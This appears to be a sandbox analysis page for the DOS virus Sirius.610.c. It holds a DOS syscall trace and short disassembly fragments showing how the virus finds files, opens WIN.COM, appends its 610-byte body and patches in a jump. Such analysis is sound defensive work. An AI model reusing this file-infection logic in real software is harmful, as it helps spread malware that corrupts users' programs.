Sample viewer

vx.netlux.org/Virus.DOS.Sirius.610.c

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:15.149673488Z 53 PC: 200cc | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.150834791Z 37 PC: 200e0 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.151857066Z 26 PC: 200e7 | Set disk transfer address
2018-12-17T22:24:15.153732047Z 25 PC: 200eb | Get default drive
2018-12-17T22:24:15.154830977Z 71 PC: 200f8 | Get current directory
2018-12-17T22:24:15.157610281Z 14 PC: 2010e | Set default drive (Drive = 'C')
2018-12-17T22:24:15.159192501Z 59 PC: 20298 | Change current directory
2018-12-17T22:24:15.162841016Z 44 PC: 20115 | Get time 0x20115: shr dl, 1
0x20117: shr dl, 1
0x20119: add dl, 0x40
0x2011c: mov byte ptr [bp + 0x220], dl
0x20120: sub bx, bx
0x20122: mov ah, 0x4e
0x20124: lea dx, word ptr [bp + 0x220]
0x20128: mov cx, 0x11
0x2012b: int 0x21
0x2012d: jae 0x2014a
0x2012f: mov al, byte ptr [bp + 0x220]
0x20133: inc al
0x20135: cmp al, 0x5a
0x20137: jbe 0x2013b
0x20139: sub al, 0x1a
0x2013b: mov byte ptr [bp + 0x220], al
0x2013f: inc bh
0x20141: cmp bh, 0x1b
0x20144: je 0x200f8
0x20146: jmp 0x20122
2018-12-17T22:24:15.164844194Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.171014883Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.176170358Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.181319216Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.186747065Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.192209442Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.197528475Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.203104898Z 78 PC: 2012d | Find first file
2018-12-17T22:24:15.208671469Z 59 PC: 20151 | Change current directory
2018-12-17T22:24:15.217849289Z 78 PC: 2015c | Find first file
2018-12-17T22:24:15.22725427Z 67 PC: 201b8 | Get or set file attributes
2018-12-17T22:24:15.233666912Z 67 PC: 201c5 | Get or set file attributes
2018-12-17T22:24:15.577003461Z 61 PC: 201cd | Open file (Filename = 'WIN.COM')
2018-12-17T22:24:15.58146132Z 87 PC: 201d3 | Get or set file date and time
2018-12-17T22:24:15.582784883Z 44 PC: 201e6 | Get time 0x201e6: or dx, dx
0x201e8: je 0x201e2
0x201ea: mov word ptr [bp + 0x255], dx
0x201ee: mov ah, 0x3f
0x201f0: lea dx, word ptr [bp + 0x217]
0x201f4: mov cx, 3
0x201f7: int 0x21
0x201f9: mov ax, 0x4202
0x201fc: sub cx, cx
0x201fe: cdq
0x201ff: int 0x21
0x20201: sub ax, 3
0x20204: mov word ptr cs:[0xfa79], ax
0x20208: mov byte ptr cs:[0xfa78], 0xe9
0x2020e: nop
0x2020f: nop
0x20210: nop
0x20211: lea si, word ptr [bp - 5]
0x20214: mov di, 0xfb2c
0x20217: mov cx, 0x262
2018-12-17T22:24:15.584208851Z 63 PC: 201f9 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:24:15.588162249Z 66 PC: 20201 | Move file pointer
2018-12-17T22:24:15.590808791Z 64 PC: 2022d | Write file or device (Write 610 bytes on handle 5)
2018-12-17T22:24:15.598888051Z 66 PC: 20235 | Move file pointer
2018-12-17T22:24:15.601097774Z 64 PC: 2023f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:24:15.608724405Z 87 PC: 20254 | Get or set file date and time
2018-12-17T22:24:15.610334821Z 62 PC: 20258 | Close file
2018-12-17T22:24:15.61679945Z 67 PC: 20265 | Get or set file attributes
2018-12-17T22:24:15.62692116Z 14 PC: 202a2 | Set default drive (Drive = 'A')
2018-12-17T22:24:15.628210035Z 59 PC: 20298 | Change current directory
2018-12-17T22:24:15.632474401Z 59 PC: 202aa | Change current directory
2018-12-17T22:24:15.634627919Z 37 PC: 2027e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.635633564Z 26 PC: 20286 | Set disk transfer address
2018-12-17T22:24:15.636911928Z 80 PC: 13fb9 | Set current PSP
2018-12-17T22:24:15.637894797Z 48 PC: 13fbe | Get DOS version
2018-12-17T22:24:15.639103224Z 101 PC: 14044 | Get extended country info
2018-12-17T22:24:15.64003944Z 99 PC: 1404a | Get DBCS lead byte table pointer
2018-12-17T22:24:15.641356114Z 74 PC: 140ac | Reallocate memory
2018-12-17T22:24:15.642485421Z 25 PC: 140e3 | Get default drive
2018-12-17T22:24:15.643394318Z 37 PC: 13ba3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-17T22:24:15.645231054Z 37 PC: 13baa | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-17T22:24:15.646148303Z 37 PC: 13bb1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:24:15.648106226Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.650498379Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.652602811Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.653889761Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.656464715Z 2 PC: 13e6c | Character output (Char = '4d')
2018-12-17T22:24:15.657917701Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.65938426Z 2 PC: 13e6c | Character output (Char = '63')
2018-12-17T22:24:15.661230679Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.662710243Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.664024837Z 2 PC: 13e6c | Character output (Char = '73')
2018-12-17T22:24:15.665776874Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.667266876Z 2 PC: 13e6c | Character output (Char = '66')
2018-12-17T22:24:15.668714355Z 2 PC: 13e6c | Character output (Char = '74')
2018-12-17T22:24:15.670808156Z 2 PC: 13e6c | Character output (Char = '28')
2018-12-17T22:24:15.672332561Z 2 PC: 13e6c | Character output (Char = '52')
2018-12-17T22:24:15.673889483Z 2 PC: 13e6c | Character output (Char = '29')
2018-12-17T22:24:15.676184156Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.67759263Z 2 PC: 13e6c | Character output (Char = '4d')
2018-12-17T22:24:15.678925896Z 2 PC: 13e6c | Character output (Char = '53')
2018-12-17T22:24:15.687804167Z 2 PC: 13e6c | Character output (Char = '2d')
2018-12-17T22:24:15.69080399Z 2 PC: 13e6c | Character output (Char = '44')
2018-12-17T22:24:15.693002215Z 2 PC: 13e6c | Character output (Char = '4f')
2018-12-17T22:24:15.704114096Z 2 PC: 13e6c | Character output (Char = '53')
2018-12-17T22:24:15.706484141Z 2 PC: 13e6c | Character output (Char = '28')
2018-12-17T22:24:15.708830475Z 2 PC: 13e6c | Character output (Char = '52')
2018-12-17T22:24:15.711438322Z 2 PC: 13e6c | Character output (Char = '29')
2018-12-17T22:24:15.713764439Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.716068523Z 2 PC: 13e6c | Character output (Char = '56')
2018-12-17T22:24:15.718336148Z 2 PC: 13e6c | Character output (Char = '65')
2018-12-17T22:24:15.720251788Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.722588143Z 2 PC: 13e6c | Character output (Char = '73')
2018-12-17T22:24:15.724820256Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.727463984Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.729677873Z 2 PC: 13e6c | Character output (Char = '6e')
2018-12-17T22:24:15.732491871Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.735327305Z 2 PC: 13e6c | Character output (Char = '36')
2018-12-17T22:24:15.737300761Z 2 PC: 13e6c | Character output (Char = '2e')
2018-12-17T22:24:15.739567428Z 2 PC: 13e6c | Character output (Char = '32')
2018-12-17T22:24:15.741509883Z 2 PC: 13e6c | Character output (Char = '32')
2018-12-17T22:24:15.743757017Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.745752834Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.749135607Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.751969542Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.760735426Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.762675888Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.773964246Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.776082465Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.777965928Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.780725648Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.783761048Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.786369207Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.789535126Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.791964615Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.793865965Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.796768504Z 2 PC: 13e6c | Character output (Char = '28')
2018-12-17T22:24:15.799028617Z 2 PC: 13e6c | Character output (Char = '43')
2018-12-17T22:24:15.801153322Z 2 PC: 13e6c | Character output (Char = '29')
2018-12-17T22:24:15.804703829Z 2 PC: 13e6c | Character output (Char = '43')
2018-12-17T22:24:15.806707979Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.808576485Z 2 PC: 13e6c | Character output (Char = '70')
2018-12-17T22:24:15.810994705Z 2 PC: 13e6c | Character output (Char = '79')
2018-12-17T22:24:15.813262974Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.815293615Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.817808196Z 2 PC: 13e6c | Character output (Char = '67')
2018-12-17T22:24:15.81978264Z 2 PC: 13e6c | Character output (Char = '68')
2018-12-17T22:24:15.821730641Z 2 PC: 13e6c | Character output (Char = '74')
2018-12-17T22:24:15.824093261Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.826403991Z 2 PC: 13e6c | Character output (Char = '4d')
2018-12-17T22:24:15.828767393Z 2 PC: 13e6c | Character output (Char = '69')
2018-12-17T22:24:15.831311759Z 2 PC: 13e6c | Character output (Char = '63')
2018-12-17T22:24:15.833510265Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.835471758Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.837689909Z 2 PC: 13e6c | Character output (Char = '73')
2018-12-17T22:24:15.8397405Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.842068706Z 2 PC: 13e6c | Character output (Char = '66')
2018-12-17T22:24:15.844029009Z 2 PC: 13e6c | Character output (Char = '74')
2018-12-17T22:24:15.84596558Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.849892165Z 2 PC: 13e6c | Character output (Char = '43')
2018-12-17T22:24:15.851914149Z 2 PC: 13e6c | Character output (Char = '6f')
2018-12-17T22:24:15.853837278Z 2 PC: 13e6c | Character output (Char = '72')
2018-12-17T22:24:15.85670692Z 2 PC: 13e6c | Character output (Char = '70')
2018-12-17T22:24:15.859478879Z 2 PC: 13e6c | Character output (Char = '20')
2018-12-17T22:24:15.861273935Z 2 PC: 13e6c | Character output (Char = '31')
2018-12-17T22:24:15.864051387Z 2 PC: 13e6c | Character output (Char = '39')
2018-12-17T22:24:15.866251481Z 2 PC: 13e6c | Character output (Char = '38')
2018-12-17T22:24:15.868299465Z 2 PC: 13e6c | Character output (Char = '31')
2018-12-17T22:24:15.870992073Z 2 PC: 13e6c | Character output (Char = '2d')
2018-12-17T22:24:15.872965707Z 2 PC: 13e6c | Character output (Char = '31')
2018-12-17T22:24:15.875122Z 2 PC: 13e6c | Character output (Char = '39')
2018-12-17T22:24:15.877776005Z 2 PC: 13e6c | Character output (Char = '39')
2018-12-17T22:24:15.879917065Z 2 PC: 13e6c | Character output (Char = '34')
2018-12-17T22:24:15.881876155Z 2 PC: 13e6c | Character output (Char = '2e')
2018-12-17T22:24:15.884510827Z 2 PC: 13e6c | Character output (Char = '0d')
2018-12-17T22:24:15.886627894Z 2 PC: 13e6c | Character output (Char = '0a')
2018-12-17T22:24:15.891849469Z 74 PC: 12d4c | Reallocate memory
2018-12-17T22:24:15.894033572Z 72 PC: 12d8d | Allocate memory
2018-12-17T22:24:15.895442479Z 72 PC: 12dc5 | Allocate memory
2018-12-17T22:24:15.896970265Z 72 PC: 12dcd | Allocate memory